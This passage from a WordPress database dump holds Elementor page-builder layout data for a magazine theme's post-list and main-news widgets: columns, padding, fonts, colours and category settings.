95\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"e37o4qh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"328\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1086,404,'_elementor_version','0.4'),(1087,404,'_elementor_css','a:3:{s:4:\"time\";i:1508851349;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1091,405,'_edit_last','1'),(1092,405,'_edit_lock','1509542115:1'),(1096,405,'_wp_page_template','default'),(1099,408,'_elementor_edit_mode','builder'),(1100,408,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\"